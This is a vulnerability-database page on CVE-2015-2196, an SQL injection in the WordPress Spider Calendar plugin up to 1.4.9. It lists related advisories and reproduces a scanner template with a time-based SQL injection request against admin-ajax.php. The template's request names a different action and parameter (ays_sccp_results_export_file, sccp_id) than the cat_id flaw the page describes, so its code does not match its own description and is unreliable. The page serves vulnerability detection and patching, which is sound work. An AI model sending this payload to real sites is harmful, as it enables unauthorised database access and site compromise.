Vulners
Lucene search
WordPress Spider Calendar <=1.4.9 - SQL Injection
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2015-2196 | 13 Feb 201500:00 | – | circl |
 | WordPress Plugin Spider Event Calendar SQL Injection Vulnerability | 4 Mar 201500:00 | – | cnvd |
 | WordPress Webdorado Spider Event Calendar Plugin SQL Injection (CVE-2015-2196) | 25 Jan 201600:00 | – | checkpoint_advisories |
 | CVE-2015-2196 | 3 Mar 201519:00 | – | cve |
 | CVE-2015-2196 | 3 Mar 201519:00 | – | cvelist |
 | EUVD-2015-2303 | 7 Oct 202500:30 | – | euvd |
 | KLA10491 Multiple vulnerabilities in WordPress plugins | 17 Mar 201500:00 | – | kaspersky |
 | CVE-2015-2196 | 3 Mar 201519:59 | – | nvd |
 | WordPress Webdorado Spider Event Calendar SQL Injection | 9 Mar 201500:00 | – | openvas |
 | WordPress Web Dorado Spider Event Calendar Plugin 1.4.9 - SQL Injection | 13 Feb 201500:00 | – | patchstack |
10
id: CVE-2015-2196
info:
name: WordPress Spider Calendar <=1.4.9 - SQL Injection
author: theamanrawat
severity: high
description: |
WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or complete compromise of the WordPress site.
remediation: Fixed in version 1.4.14.
reference:
- https://wpscan.com/vulnerability/8d436356-37f8-455e-99b3-effe8d0e3cad
- https://wordpress.org/plugins/spider-event-calendar/
- http://www.exploit-db.com/exploits/36061
- https://nvd.nist.gov/vuln/detail/CVE-2015-2196
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2015-2196
cwe-id: CWE-89
epss-score: 0.11182
epss-percentile: 0.95387
cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: web-dorado
product: spider_calendar
framework: wordpress
tags: time-based-sqli,cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado,vuln
http:
- raw:
- |
@timeout 10s
GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration_1>=6'
- 'status_code == 200'
- 'contains(body, "{\"status\":true,\"data\"")'
condition: and
# digest: 4a0a0047304502203974122c625d10fe4da3787b86cbad73fbbde47805d931b80810a737704182c1022100b75045fb1a45f1009c93797683af2e3d928135e79b035743ef61c8420474573d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 27.5
EPSS0.11182